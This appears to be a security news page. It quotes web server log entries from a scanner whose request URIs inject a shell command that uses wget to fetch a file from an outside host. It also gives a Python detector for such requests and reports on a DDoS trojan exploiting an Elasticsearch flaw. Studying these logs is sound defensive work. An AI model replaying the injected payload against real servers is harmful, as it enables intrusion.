Information Security News
What InfoSec can learn from the insurance industry
iT News (blog)
That kind of raw data - rather than the vendor-sponsored and spun surveys that nobody trusts - would make life a great deal easier for my infosec acquaintance and colleagues. It also makes (yet another) strong case for mandatory data breach reporting.
Our reader Robin submitted the following detect:
I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day
The URL that appears to be retrieved does not exist, even though the domain does.
In our own web logs, we have seen a couple of similar requests:
126.96.36.199 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
188.8.131.52 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
184.108.40.206 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day".
There are a couple of other security-related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
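One way to find these requests in an access log, as an added example that is not part of the original diary entry: it parses combined-format lines, URL-decodes the request target, and flags both the "apach0day" user-agent substring and a shell separator followed by wget or curl. The function names, the regular expressions and the sample lines (documentation-range addresses, example.invalid) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format; fields after the user agent are ignored.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Shell separator followed by a download tool, checked after URL-decoding.
# "&" is left out because it is the normal query-string separator.
CMD_RE = re.compile(r'[;|`]\s*(?:wget|curl)\b', re.IGNORECASE)
UA_MARKER = "apach0day"  # substring shared by the user agents quoted above

def classify(line):
    """Return (ip, reasons) for a log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    reasons = []
    if UA_MARKER in m["ua"].lower():
        reasons.append("user-agent")
    if CMD_RE.search(unquote(m["target"])):
        reasons.append("command-in-uri")
    return m["ip"], reasons

def scan(lines):
    """Map each source IP to the sorted reasons it was flagged for."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            hits.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(r) for ip, r in hits.items()}

# Constructed sample: the first request and user agent follow the entries
# above; addresses are placeholders; the last line is benign traffic.
SAMPLE = [
    '192.0.2.10 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"',
    '192.0.2.11 - - [28/Jul/2014:20:04:07 +0000] "GET /?q=1;wget%20example.invalid/x HTTP/1.0" 301 178 "-" "Mozilla/5.0" "-"',
    '192.0.2.12 - - [28/Jul/2014:21:00:00 +0000] "GET /downloads/wget-manual.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE).items():
        print(ip, ", ".join(reasons))
```

Matching on the decoded URI as well as the user agent keeps the check useful if the scanner's user-agent string changes.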
Attackers have figured out a new way to get Amazon's cloud service to wage potent denial-of-service attacks on third-party websites—by exploiting security vulnerabilities in an open source search and analytics application known as Elasticsearch.
The power of Backdoor.Linux.Ganiw.a was documented earlier this month by researchers from antivirus provider Kaspersky Lab. Among other things, the trojan employs DNS amplification, a technique that vastly increases the volume of junk traffic being directed at a victim by abusing poorly secured domain name system servers. By sending DNS queries that are malformed to appear as if they came from the victim domain, DNS amplification can boost attack volume by 10-fold or more. The technique can be especially hard to block when distributed among thousands or hundreds of thousands of compromised computers.
Late last week, Kaspersky Lab expert Kurt Baumgartner reported that the DDoS bot is actively compromising Amazon Elastic Cloud Computing (EC2) hosts and very possibly those of competing cloud services. The foothold that allows the nodes to be hijacked is a vulnerability in 1.1.x versions of Elasticsearch, he said. The attackers are modifying proof-of-concept attack code for the vulnerability, indexed as CVE-2014-3120 in the Common Vulnerabilities and Exposures database, that gives them the ability to remotely execute powerful Linux commands through a bash shell window. The Gani backdoor, in turn, installs several other malicious scripts on compromised computers, including Backdoor.Perl.RShell.c and Backdoor.Linux.Mayday.g. The Mayday backdoor then floods sites with data packets based on the user datagram protocol.